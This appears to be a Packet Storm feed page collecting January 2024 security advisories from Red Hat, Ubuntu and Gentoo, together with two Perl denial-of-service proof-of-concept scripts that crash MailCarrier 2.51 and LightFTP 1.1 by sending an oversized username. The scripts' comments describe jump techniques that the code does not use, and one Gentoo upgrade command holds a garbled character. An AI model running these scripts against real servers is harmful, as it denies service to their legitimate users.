Red Hat Security Advisory 2024-0255-03 - An update for.NET 6.0 is now available for Red Hat Enterprise Linux 7. Issues addressed include bypass, denial of service, and information leakage vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0255.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: .NET 6.0 security, bug fix, and enhancement updateAdvisory ID:        RHSA-2024:0255-03Product:            .NET Core on Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0255Issue date:         2024-01-15Revision:           03CVE Names:          CVE-2024-0056====================================================================Summary: An update for .NET 6.0 is now available for Red Hat Enterprise Linux 7.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:.NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation.New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.126 and .NET Runtime 6.0.26.The following packages have been upgraded to a later upstream version: rh-dotnet60-dotnet (6.0.126). (BZ#2255300)Security Fix(es):* dotnet: Information Disclosure: MD.SqlClient(MDS) & System.data.SQLClient (SDS) (CVE-2024-0056)* dotnet: X509 Certificates - Validation Bypass across Azure (CVE-2024-0057)* dotnet: .NET Denial of Service Vulnerability (CVE-2024-21319)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-0056References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2255384https://bugzilla.redhat.com/show_bug.cgi?id=2255386https://bugzilla.redhat.com/show_bug.cgi?id=2257566

Red Hat Security Advisory 2024-0255-03

Red Hat Security Advisory 2024-0254-03 - An update for rsync is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a buffer over-read vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0254.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: rsync security updateAdvisory ID:        RHSA-2024:0254-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0254Issue date:         2024-01-15Revision:           03CVE Names:          CVE-2022-37434====================================================================Summary: An update for rsync is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The rsync utility enables the users to copy and synchronize files locally or across a network. Synchronization with rsync is fast because rsync only sends the differences in files over the network instead of sending whole files. The rsync utility is also used as a mirroring tool.Security Fix(es):* rsync: zlib: heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field (CVE-2022-37434)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2022-37434References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2116639

Red Hat Security Advisory 2024-0254-03

Red Hat Security Advisory 2024-0253-03 - An update for sqlite is now available for Red Hat Enterprise Linux 8. Issues addressed include a buffer overflow vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0253.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: sqlite security updateAdvisory ID:        RHSA-2024:0253-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0253Issue date:         2024-01-15Revision:           03CVE Names:          CVE-2023-7104====================================================================Summary: An update for sqlite is now available for Red Hat Enterprise Linux 8.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:SQLite is a C library that implements an SQL database engine. A large subset of SQL92 is supported. A complete database is stored in a single disk file. The API is designed for convenience and ease of use. Applications that link against SQLite can enjoy the power and flexibility of an SQL database without the administrative hassles of supporting a separate database server.Security Fix(es):* sqlite: heap-buffer-overflow at sessionfuzz (CVE-2023-7104)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-7104References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2256194

Red Hat Security Advisory 2024-0253-03

Red Hat Security Advisory 2024-0252-03 - An update for krb5 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include bypass and cross site request forgery vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0252.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: krb5 security updateAdvisory ID:        RHSA-2024:0252-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0252Issue date:         2024-01-15Revision:           03CVE Names:          CVE-2020-17049====================================================================Summary: An update for krb5 is now available for Red Hat Enterprise Linux 8.6 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center (KDC).Security Fix(es):* Kerberos: delegation constrain bypass in S4U2Proxy (CVE-2020-17049)* ipa: Invalid CSRF protection (CVE-2023-5455)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2020-17049References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2025721https://bugzilla.redhat.com/show_bug.cgi?id=2242828https://issues.redhat.com/browse/RHEL-17108

Red Hat Security Advisory 2024-0252-03

Ubuntu Security Notice 6582-1 - Several security issues were discovered in the WebKitGTK Web and JavaScript engines. If a user were tricked into viewing a malicious website, a remote attacker could exploit a variety of issues related to web browser security, including cross-site scripting attacks, denial of service attacks, and arbitrary code execution.

==========================================================================  
Ubuntu Security Notice USN-6582-1  
January 15, 2024

webkit2gtk vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in WebKitGTK.

Software Description:  
- webkit2gtk: Web content engine library for GTK+

Details:

Several security issues were discovered in the WebKitGTK Web and JavaScript  
engines. If a user were tricked into viewing a malicious website, a remote  
attacker could exploit a variety of issues related to web browser security,  
including cross-site scripting attacks, denial of service attacks, and  
arbitrary code execution.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libjavascriptcoregtk-4.0-18     2.42.4-0ubuntu0.23.10.1  
   libjavascriptcoregtk-4.1-0      2.42.4-0ubuntu0.23.10.1  
   libjavascriptcoregtk-6.0-1      2.42.4-0ubuntu0.23.10.1  
   libwebkit2gtk-4.0-37            2.42.4-0ubuntu0.23.10.1  
   libwebkit2gtk-4.1-0             2.42.4-0ubuntu0.23.10.1  
   libwebkitgtk-6.0-4              2.42.4-0ubuntu0.23.10.1

Ubuntu 23.04:  
   libjavascriptcoregtk-4.0-18     2.42.4-0ubuntu0.23.04.1  
   libjavascriptcoregtk-4.1-0      2.42.4-0ubuntu0.23.04.1  
   libjavascriptcoregtk-6.0-1      2.42.4-0ubuntu0.23.04.1  
   libwebkit2gtk-4.0-37            2.42.4-0ubuntu0.23.04.1  
   libwebkit2gtk-4.1-0             2.42.4-0ubuntu0.23.04.1  
   libwebkitgtk-6.0-4              2.42.4-0ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
   libjavascriptcoregtk-4.0-18     2.42.4-0ubuntu0.22.04.1  
   libjavascriptcoregtk-4.1-0      2.42.4-0ubuntu0.22.04.1  
   libjavascriptcoregtk-6.0-1      2.42.4-0ubuntu0.22.04.1  
   libwebkit2gtk-4.0-37            2.42.4-0ubuntu0.22.04.1  
   libwebkit2gtk-4.1-0             2.42.4-0ubuntu0.22.04.1  
   libwebkitgtk-6.0-4              2.42.4-0ubuntu0.22.04.1

This update uses a new upstream release, which includes additional bug  
fixes. After a standard system update you need to restart any applications  
that use WebKitGTK, such as Epiphany, to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6582-1  
   CVE-2023-42883

Package Information:  
   https://launchpad.net/ubuntu/+source/webkit2gtk/2.42.4-0ubuntu0.23.10.1  
   https://launchpad.net/ubuntu/+source/webkit2gtk/2.42.4-0ubuntu0.23.04.1  
   https://launchpad.net/ubuntu/+source/webkit2gtk/2.42.4-0ubuntu0.22.04.1

Ubuntu Security Notice USN-6582-1

MailCarrier version 2.51 remote denial of service exploit.

    #!/usr/bin/perluse IO::Socket::INET# Exploit Title: MailCarrier 2.51 - Denial of Service (DoS)# Discovery by: Fernando Mengali# Discovery Date: 16 january 2024# Tested Version: MailCarrier 2.51# Tested on: Window XP Professional - Service Pack 2 and 3 - English# Vulnerability Type: Denial of Service (DoS)#1. Description#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).#For this exploit I have tried several strategies to increase reliability and performance:#Jump to a static 'call esp'#Backwards jump to code a known distance from the stack pointer.#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.#When authenticating to the POP3 server with a long USERNAME or a USERNAME with a large number of characters for the POP3 server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.#2. Proof of Concept - PoC    $sis="$^O";    if ($sis eq "windows"){      $cmd="cls";    } else {      $cmd="clear";    }    system("$cmd");        intro();    main();        print "[+] Exploiting... \n";    my $buf  = "\x41" x 6000;    my $s = IO::Socket::INET->new(        PeerAddr => $ip,        PeerPort => $port,        Proto    => 'tcp'    ) or die "Unable to connect: $!\n";    $s->recv(my $data, 1024);    # Grab banners (if any)    $s->send('USER ' . $buf . "\r\n");    $s->recv(my $response, 1024);    $s->send("QUIT\r\n");    $s->close();    print "[+] Done - Exploited success!!!!!\n\n";     sub intro {      print q {                              ,--,                       _ ___/ /\|                   ,;'( )__, )  ~                  //  //   '--;                   '   \     | ^                       ^    ^      [+] MailCarrier 2.51 - Denial of Service (DoS)      [*] Coded by Fernando Mengali      [@] e-mail: fernando.mengalli@gmail.com      }  }  sub main {our ($ip, $port) = @ARGV;      unless (defined($ip) && defined($port)) {        print "       \nUsage: $0 <ip> <port>                 \n";        exit(-1);      }  }#3. Solution/ How to fix:# This version product is deprecated

MailCarrier 2.51 Denial Of Service

Ubuntu Security Notice 6580-1 - It was discovered that w3m incorrectly handled certain HTML files. An attacker could possibly use this issue to cause a crash or execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6580-1  
January 15, 2024

w3m vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 23.04  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

w3m could be made to crash or run programs as your login if it opened a malicious website.

Software Description:  
- w3m: WWW browsable pager with excellent tables/frames support

Details:

It was discovered that w3m incorrectly handled certain HTML files.  
An attacker could possibly use this issue to cause a crash or  
execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
  w3m                             0.5.3+git20230121-2ubuntu0.23.10.1

Ubuntu 23.04:  
  w3m                             0.5.3+git20230121-2ubuntu0.23.04.1

Ubuntu 22.04 LTS:  
  w3m                             0.5.3+git20210102-6ubuntu0.2

Ubuntu 20.04 LTS:  
  w3m                             0.5.3-37ubuntu0.2

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
  w3m                             0.5.3-36ubuntu0.1+esm1

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
  w3m                             0.5.3-15ubuntu0.2+esm2

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6580-1  
  CVE-2023-4255

Package Information:  
  https://launchpad.net/ubuntu/+source/w3m/0.5.3+git20230121-2ubuntu0.23.10.1  
  https://launchpad.net/ubuntu/+source/w3m/0.5.3+git20230121-2ubuntu0.23.04.1  
  https://launchpad.net/ubuntu/+source/w3m/0.5.3+git20210102-6ubuntu0.2  
  https://launchpad.net/ubuntu/+source/w3m/0.5.3-37ubuntu0.2

Ubuntu Security Notice USN-6580-1

LightFTP version 1.1 remote denial of service exploit.

#!/usr/bin/perl

use Net::FTP;

# Exploit Title: LightFTP 1.1 - Denial of Service (DoS)  
# Discovery by: Fernando Mengali  
# Discovery Date: 15 january 2024  
# Vendor Homepage:  N/A  
# Notification vendor: No reported  
# Tested Version: LightFTP 1.1  
# Tested on: Window XP Professional - Service Pack 2 and 3 - English  
# Vulnerability Type: Denial of Service (DoS)

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).  
#For this exploit I have tried several strategies to increase reliability and performance:  
#Jump to a static 'call esp'  
#Backwards jump to code a known distance from the stack pointer.  
#The server does not correctly handle the amount of data or bytes of the USERNAME entered by the user.  
#When authenticating to the FTP server with a long USERNAME or a USERNAME with a large number of characters for the FTP server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.  
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){  
      $cmd="cls";  
    } else {  
      $cmd="clear";  
    }

    system("$cmd");

        intro();  
    main();

        print "[+] Exploiting... \n";

    my $payload = "\x41"x500;    

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Não foi possível se conectar ao servidor: $@";

    $ftp->login($payload,"anonymous") or die "[+] Possibly exploited!";              

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";

     sub intro {  
      print q {

                              ,--,  
                       _ ___/ /\|  
                   ,;'( )__, )  ~  
                  //  //   '--;   
                  '   \     | ^  
                       ^    ^

      [+] LightFTP 1.1 - Denial of Service (DoS)

      [*] Coded by Fernando Mengali

      [@] e-mail: fernando.mengalli@gmail.com

      }  
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";  
        exit(-1);

      }  
  }

#3. Solution/ How to fix:

# This version product is deprecated

LightFTP 1.1 Denial Of Service

Gentoo Linux Security Advisory 202401-18 - A vulnerability has been found in zlib that can lead to a heap-based buffer overflow. Versions greater than or equal to 1.2.13-r2 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-18  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: zlib: Buffer Overflow  
     Date: January 15, 2024  
     Bugs: #916484  
       ID: 202401-18

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in zlib that can lead to a heap-based  
buffer overflow.

Background  
=========  
zlib is a widely used free and patent unencumbered data compression  
library.

Affected packages  
================  
Package        Vulnerable    Unaffected  
-------------  ------------  ------------  
sys-libs/zlib  < 1.2.13-r2   >= 1.2.13-r2

Description  
==========  
A vulnerability has been discovered in zlib. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
MiniZip in zlib through 1.3 has an integer overflow and resultant heap-  
based buffer overflow in ZipOpenNewFileInZip4_64 via a long filename,  
comment, or extra field.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All zlib users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-libs/zlib-1.2.13-r2"

References  
=========  
[ 1 ] CVE-2023-45853  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45853

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-18

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-18

Gentoo Linux Security Advisory 202401-17 - A vulnerability has been found in libgit2 which could result in privilege escalation. Versions greater than or equal to 1.4.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-17  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: libgit2: Privilege Escalation Vulnerability  
     Date: January 14, 2024  
     Bugs: #857792  
       ID: 202401-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been found in libgit2 which could result in  
privilege escalation.

Background  
=========  
libgit2 is a portable, pure C implementation of the Git core methods  
provided as a re-entrant linkable library with a solid API.

Affected packages  
================  
Package           Vulnerable    Unaffected  
----------------  ------------  ------------  
dev-libs/libgit2  < 1.4.4       >= 1.4.4

Description  
==========  
A vulnerability has been discovered in libgit2. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
Usages of a malicious crafted Git repository could allow the creator of  
the repository to elevate privileges to those of the user accessing the  
repository.

Workaround  
=========  
Administrators can ensure that their usages of libgit2 only interact  
with repositories which have only been modified by trusted users.

Resolution  
=========  
All libgit2 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-libs/libgit2-1.4.4"

References  
=========  
[ 1 ] CVE-2022-29187  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29187

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-17

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Source

Packet Storm